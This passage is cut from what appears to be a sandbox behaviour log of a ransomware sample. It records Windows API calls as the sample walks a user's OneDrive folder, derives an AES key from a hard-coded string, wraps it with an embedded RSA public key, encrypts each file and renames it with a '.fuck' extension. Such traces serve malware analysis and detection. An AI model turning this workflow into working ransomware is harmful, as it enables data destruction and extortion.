phKey=0x2b9d1f0*=0x2faac8) returned 1 [0274.401] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0274.401] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29ca0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f29ca0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0274.401] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29ca0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f29ca0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0274.402] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.417] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x264, lpOverlapped=0x0) returned 1 [0274.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x264, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x270) returned 1 [0274.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x270, lpOverlapped=0x0) returned 1 [0274.421] CloseHandle (hObject=0x5d4c) returned 1 [0274.421] CloseHandle (hObject=0x5d48) returned 1 [0274.421] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png"), bFailIfExists=0) returned 1 [0274.425] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png", dwFileAttributes=0x0) returned 1 [0274.425] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png.gsg")) returned 1 [0274.426] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\Error.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\error.png.fuck")) returned 1 [0274.428] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0274.428] CryptDestroyKey (hKey=0x2fa748) returned 1 [0274.428] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0274.428] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.428] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0274.428] GetLastError () returned 0x0 [0274.428] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html")) returned 0x20 [0274.428] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html", dwFileAttributes=0x80) returned 1 [0274.429] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.430] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.431] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html.gsg", dwFileAttributes=0x2) returned 1 [0274.431] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0274.434] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0274.434] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.434] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.434] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0274.434] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.434] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0274.434] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f29ec0) returned 1 [0274.434] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29ec0, dwCertEncodingType=0x1, pInfo=0x2f34720*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34750*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34758*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fb6c8) returned 1 [0274.434] CryptEncrypt (in: hKey=0x2fb6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0274.435] CryptEncrypt (in: hKey=0x2fb6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a498*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a498*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0274.435] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f2a498*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f2a498*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0274.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.438] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.438] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.443] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.444] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.444] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x244, lpOverlapped=0x0) returned 1 [0274.444] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x244, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x250) returned 1 [0274.444] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x250, lpOverlapped=0x0) returned 1 [0274.444] CloseHandle (hObject=0x5d48) returned 1 [0274.444] CloseHandle (hObject=0x5d4c) returned 1 [0274.444] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html"), bFailIfExists=0) returned 1 [0274.447] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html", dwFileAttributes=0x0) returned 1 [0274.448] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html.gsg")) returned 1 [0274.449] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ErrorPage.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\errorpage.html.fuck")) returned 1 [0274.450] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0274.450] CryptDestroyKey (hKey=0x2fa748) returned 1 [0274.450] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0274.450] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.451] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.451] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.451] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.451] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.451] GetLastError () returned 0x0 [0274.451] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.452] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.453] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.454] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.455] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0274.457] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.457] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.458] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.458] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0274.458] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.458] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.458] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29f48) returned 1 [0274.458] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29f48, dwCertEncodingType=0x1, pInfo=0x2f348c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f348f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f348f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb388) returned 1 [0274.458] CryptEncrypt (in: hKey=0x2fb388, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.458] CryptEncrypt (in: hKey=0x2fb388, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a740*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a740*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.459] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2a740*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 